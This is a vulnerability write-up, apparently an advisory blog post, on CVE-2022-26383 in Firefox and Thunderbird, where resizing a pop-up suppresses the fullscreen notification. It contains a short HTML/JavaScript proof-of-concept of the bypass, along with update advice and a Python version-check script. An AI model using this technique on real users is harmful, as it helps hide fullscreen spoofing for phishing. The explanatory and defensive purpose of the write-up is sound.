CVE-2022-26383 is a critical vulnerability in Firefox, Firefox ESR, and Thunderbird. It concerns the interaction between resizing a pop-up window and requesting fullscreen access: an attacker can use it to bypass the fullscreen notification, which can enable malicious activity such as phishing and theft of user information.

Exploit Details

CVE-2022-26383 was discovered when security researchers observed an inconsistency in how a pop-up window is resized after requesting fullscreen access. Normally, any fullscreen access request triggers a notification that alerts the user. However, when the pop-up window is resized immediately after the fullscreen request, the fullscreen notification is not displayed. This lets an attacker control the web content shown on the entire screen without the user being alerted.

Here is a code snippet that demonstrates the behavior of the vulnerability:

<html>
<head>
<script>
  function launchPopup() {
    var popup = window.open('', '', 'width=300,height=150');
    popup.document.write('<script>function goFullscreen() { document.documentElement.requestFullscreen(); }<\/script><button onclick="goFullscreen()">Go Fullscreen<\/button>');
    setTimeout(() => {
      popup.resizeTo(screen.availWidth, screen.availHeight);
    }, 100);
  }
</script>
</head>
<body>
  <button onclick="launchPopup()">Launch Popup</button>
</body>
</html>

In this example, when the user clicks the "Launch Popup" button, a new pop-up window is opened containing a button titled "Go Fullscreen." Clicking that button makes the pop-up window request fullscreen access. After a short delay, the resizeTo function is called, resizing the pop-up window to the user's available screen size. As a result, the fullscreen notification is not displayed, and the user remains unaware that the web content is now shown in fullscreen mode.

Mitigation

To mitigate this vulnerability, it is recommended to update your Firefox, Firefox ESR, and Thunderbird applications to their respective latest versions (Firefox 98, Firefox ESR 91.7, and Thunderbird 91.7 or newer).

- Firefox update: Visit the Firefox download page to download the latest version.
- Firefox ESR update: Visit the Firefox ESR download page to download the latest version.
- Thunderbird update: Visit the Thunderbird download page to download the latest version.
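To verify that installed builds meet the fixed versions named above, here is an added example (not part of the original advisory) that parses the version banner printed by `firefox --version` or `thunderbird --version` and compares it against the fixed versions listed on this page. It assumes the banner formats "Mozilla Firefox 91.7.0esr" for ESR builds and "Thunderbird 91.7.0" for Thunderbird; the sample banners at the bottom are constructed, not real inventory data.

```python
import re

# Fixed versions stated on this page: Firefox 98, Firefox ESR 91.7, Thunderbird 91.7.
FIXED = {
    "firefox": (98, 0),
    "firefox-esr": (91, 7),
    "thunderbird": (91, 7),
}

# Assumed banner shapes: "Mozilla Firefox 97.0.2", "Mozilla Firefox 91.6.1esr",
# "Thunderbird 91.6.2". The optional trailing "esr" marks an ESR build.
_VERSION_RE = re.compile(r"(Mozilla Firefox|Thunderbird)\s+(\d+(?:\.\d+)*)(esr)?", re.IGNORECASE)


def parse_version_banner(banner):
    """Return (product_key, version_tuple) for a --version banner, or raise ValueError."""
    m = _VERSION_RE.search(banner)
    if not m:
        raise ValueError(f"unrecognised version banner: {banner!r}")
    name, version, esr = m.group(1).lower(), m.group(2), m.group(3)
    parts = tuple(int(p) for p in version.split("."))
    if name == "mozilla firefox":
        key = "firefox-esr" if esr else "firefox"
    else:
        key = "thunderbird"
    return key, parts


def is_patched(product, version):
    """True when version >= the fixed version; pads so 91.7 equals 91.7.0."""
    fixed = FIXED[product]
    n = max(len(fixed), len(version))
    return version + (0,) * (n - len(version)) >= fixed + (0,) * (n - len(fixed))


def check_banner(banner):
    """Return (product_key, version_string, patched_bool) for one banner."""
    product, version = parse_version_banner(banner)
    return product, ".".join(map(str, version)), is_patched(product, version)


# Constructed sample banners for demonstration only.
SAMPLE_BANNERS = [
    "Mozilla Firefox 97.0.2",
    "Mozilla Firefox 98.0",
    "Mozilla Firefox 91.6.1esr",
    "Mozilla Firefox 91.7.0esr",
    "Thunderbird 91.6.2",
    "Thunderbird 102.0",
]

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        product, ver, ok = check_banner(banner)
        print(f"{product:12} {ver:10} {'patched' if ok else 'VULNERABLE to CVE-2022-26383'}")
```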

Additionally, always exercise caution while browsing websites, and avoid clicking suspicious links that may trigger malicious pop-up windows.

Original References

- Mozilla Foundation Security Advisory
- NIST National Vulnerability Database - CVE-2022-26383

Conclusion

CVE-2022-26383 is a critical vulnerability affecting Firefox, Firefox ESR, and Thunderbird. It allows threat actors to exploit the resizing of pop-up windows to bypass the fullscreen notification. Users should update their applications to the latest versions and remain cautious of suspicious web content or links to prevent potential attacks.

Timeline

Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/30/2022 15:02:00 UTC